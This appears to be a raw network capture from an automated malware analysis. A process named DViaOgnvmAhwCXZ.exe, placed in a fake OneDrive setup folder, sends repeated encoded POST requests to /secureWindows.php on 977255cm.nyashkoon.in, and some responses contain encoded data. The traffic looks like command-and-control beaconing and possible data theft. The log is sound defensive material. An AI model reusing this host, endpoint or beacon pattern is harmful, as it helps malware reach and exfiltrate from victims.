                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:52.704732895 CET | 1072 | OUT | Data Raw: 52 52 59 57 50 5f 53 56 58 57 50 59 55 58 5b 5d 54 5d 5c 5e 59 54 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYWP_SVXWPYUX[]T]\^YTZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;01(8:]0=?9\1,Y,)$[ *$&7^()$X- F$,Z*
                                                        Oct 30, 2024 05:23:52.941870928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:53.149291039 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpf9edftnR0INSm27NkqDCTJ%2Fb6Y97d0PgDv7Z71UbNasLgfwnJa%2BHXq72o2cS1qioHl7ZP70eV6FUjOQQBzO8O50O7FHWtvC1%2FYfHRkkfV%2FhhiGXNmWwwesiXFqp219HkBNSGKcNfA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1eb8d7a6b51-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1382&delivery_rate=1396335&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        126 | 192.168.2.4 | 50129 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:53.280498981 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:53.636974096 CET | 1076 | OUT | Data Raw: 52 52 59 52 55 58 56 56 58 57 50 59 55 5e 5b 5a 54 5d 5c 5c 59 57 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RRYRUXVVXWPYU^[ZT]\\YWZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, .^+>['-7@.6<2[0Z/X7:$2,?2$(69 F$,Z*=
                                                        Oct 30, 2024 05:23:53.877460957 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:54.084144115 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvqV0GHfSUM2Qc%2FLtF8seUETB9MmgncHr177Oe8Is4qn4lIK3BlujFQzO3bXQHMBmpjx86a1R6MvXtKyyXCB%2BRifewg34uBQ74lnOPzUIyRKS8NKx22E05aumfRA0YiyiaY0MWu0lCE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f16d0b7d5d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=801328&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0
                                                        Oct 30, 2024 05:23:54.310867071 CET | 783 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jvqV0GHfSUM2Qc%2FLtF8seUETB9MmgncHr177Oe8Is4qn4lIK3BlujFQzO3bXQHMBmpjx86a1R6MvXtKyyXCB%2BRifewg34uBQ74lnOPzUIyRKS8NKx22E05aumfRA0YiyiaY0MWu0lCE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f16d0b7d5d-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1825&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=801328&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        127 | 192.168.2.4 | 50130 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:54.220940113 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:54.574472904 CET | 1076 | OUT | Data Raw: 57 50 59 50 50 5a 53 55 58 57 50 59 55 5a 5b 5c 54 52 5c 5d 59 56 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYPPZSUXWPYUZ[\TR\]YVZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/#.]+:X'.+9(\&><^/*[":/':7X+6%^0:. F$,Z*-
                                                        Oct 30, 2024 05:23:54.823973894 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:55.029006958 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kYWqOu75Kj4InUQ3gg1y2RU1owtLNGx9FXZ3DMvXECR08ZL1MlN%2BrCsAZsKhUsG9Gv7ofg00LtX8AqqOgqR3chmJ7fOhlQjzGZRkf039ytpmkLTefwNsuMmwkzzG%2BMPDauX%2FpOW74n8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1f74ca82c92-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2271&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=648164&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        128 | 192.168.2.4 | 50131 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:55.158457041 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:55.511775017 CET | 1076 | OUT | Data Raw: 57 5e 59 51 55 54 56 54 58 57 50 59 55 51 5b 5a 54 59 5c 5c 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^YQUTVTXWPYUQ[ZTY\\Y]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%82(.$=$-%,\2=(_;#"94')+6"$>9 F$,Z*
                                                        Oct 30, 2024 05:23:55.766048908 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:56.075627089 CET | 785 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCtkMEyfvME3zvsX0Pq9zxUV5eYnDnwlWTKHTAsGwa6Iw7%2BMqxBDPQCExcuOTApAAffd%2B7PkXc4npVaG2cY%2FKxq6FXTesWX2ym6JznwhFa7a5SZVOrxlC3iXBwsMIbnlGErWKH8FI6g%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1fd2afd2c9e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2186&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=685606&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        129 | 192.168.2.4 | 50132 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:56.209759951 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:56.559592009 CET | 1076 | OUT | Data Raw: 57 55 59 52 55 5f 56 5c 58 57 50 59 55 5c 5b 5a 54 5e 5c 58 59 53 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WUYRU_V\XWPYU\[ZT^\XYSZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/!<("'8:(^%8X8:X79$1<(5$8!Y-: F$,Z*5
                                                        Oct 30, 2024 05:23:56.822371006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:57.039412022 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqbhUbjvl7zyayfgDk7y2e5LPjKdPPxSKaFORHzQ3nE8NO04YU%2BL0iwex8NcOJYSyyN57T4K9bSzuZ%2BdS%2FW2hu8WTi2E%2Fhw6dr%2Fm0o%2B4UOJZ0Kr0EPeF5OYeE%2B9I04uZ1dNBj5sBGeU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a203cdfb358e-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1215785&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        130 | 192.168.2.4 | 50133 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:57.350754023 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:57.699212074 CET | 1076 | OUT | Data Raw: 52 57 59 52 55 5f 53 57 58 57 50 59 55 5f 5b 5f 54 53 5c 58 59 55 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYRU_SWXWPYU_[_TS\XYUZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;>?8&$[?B. \%.,X,:#9+'90)&9]$. F$,Z*


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        131 | 192.168.2.4 | 50134 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:57.942904949 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:58.295387983 CET | 1340 | OUT | Data Raw: 57 5e 5c 5d 55 5a 56 54 58 57 50 59 55 5a 5b 5d 54 53 5c 58 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\]UZVTXWPYUZ[]TS\XYPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%]/)+>0:C/%;8*$4&<+1\0!X9 F$,Z*-
                                                        Oct 30, 2024 05:23:58.542418003 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:58.748903990 CET | 929 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QLcpV622LVkbXz6zueeHA2swpmGe4GxdIzZZzrlfx4O7chArBKu7MKVaFN2kZoifXnh0Ns8qwoTUiM2vICzZ387Rqwg0ZRgufJF32zaslQHWnaGj5bq9QZnjIXWCXuOE2o0cr7YdMxs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a20e8ca52857-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1294&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1151949&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 13 3f 5e 37 0c 24 33 32 58 3c 05 2d 58 2a 3e 2a 14 24 57 24 5c 32 05 3e 5b 3c 3b 2f 10 3d 42 2c 5b 3f 0c 2b 05 34 25 30 5e 29 01 2f 46 0c 10 24 06 24 0c 05 52 3c 0d 26 05 29 01 33 5d 20 56 32 58 3d 29 28 0c 35 0a 24 5a 24 22 35 0a 2f 03 03 0e 2e 43 21 03 39 0d 20 56 2a 00 21 57 08 14 22 1f 31 2f 20 05 27 3e 20 58 25 32 3e 1c 34 59 23 5b 23 28 3e 59 3c 05 28 1c 25 1e 16 10 27 55 3c 0a 25 39 28 5a 28 0f 09 1c 26 33 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&?^7$32X<-X*>*$W$\2>[<;/=B,[?+4%0^)/F$$R<&)3] V2X=)(5$Z$"5/.C!9 V*!W"1/ '> X%2>4Y#[#(>Y<(%'U<%9(Z(&3"R. V2XS0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        132 | 192.168.2.4 | 50135 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:58.061199903 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:58.418790102 CET | 1076 | OUT | Data Raw: 57 52 5c 54 55 5b 56 51 58 57 50 59 55 5f 5b 52 54 58 5c 5d 59 5d 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WR\TU[VQXWPYU_[RTX\]Y]ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%- >?8.]'7-5<]%<X/:$Z#2*(+%=^')X/* F$,Z*
                                                        Oct 30, 2024 05:23:58.655775070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:58.974843025 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:58 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6r9HpWQtX5A6v5HTRV4Jj%2FpTfwmlcX9dB%2FhBJQ%2BbOEMT1Hm%2BxIZT78M1eRHZnGqwgGOeu%2BRVOpzCo5cvaPyDXHekSZJqkddR3EDJAQ3hR6NtrMUfmK7SDauiQ7sqg4HzsUzR%2F9z5h0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a20f38686b42-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1175&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1163052&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        133 | 192.168.2.4 | 50136 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:23:59.112531900 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:59.464817047 CET | 1072 | OUT | Data Raw: 57 57 5c 54 55 54 53 52 58 57 50 59 55 58 5b 5d 54 5b 5c 59 59 52 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WW\TUTSRXWPYUX[]T[\YYRZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;]?+.'-(9%<1.8[/\8##X1#)5:3+)Z: F$,Z*
                                                        Oct 30, 2024 05:23:59.706995964 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:59.918560028 CET | 789 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:59 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOg2VWfrf1wN9jZKiMSW29bYuPFv6nzBOCgfEXrLBoQHt9Bcz4plpiuWTxcb3tTgbQDRVzrVbTv%2B%2FrnngZ9NGXYT8rkQLtMkOAn4xDik8EAk3flnPMjpEtT9qYI%2BNIACRn%2FVF5G7Z%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a215dd40486b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1691&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1358&delivery_rate=888888&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        134 | 192.168.2.4 | 50137 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:24:00.047025919 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:24:00.402687073 CET | 1076 | OUT | Data Raw: 57 53 5c 51 55 5e 53 52 58 57 50 59 55 5c 5b 5d 54 52 5c 5c 59 50 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\QU^SRXWPYU\[]TR\\YPZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\, (8&X%=@9,&.?/9<#%_7<%\3(&: F$,Z*5
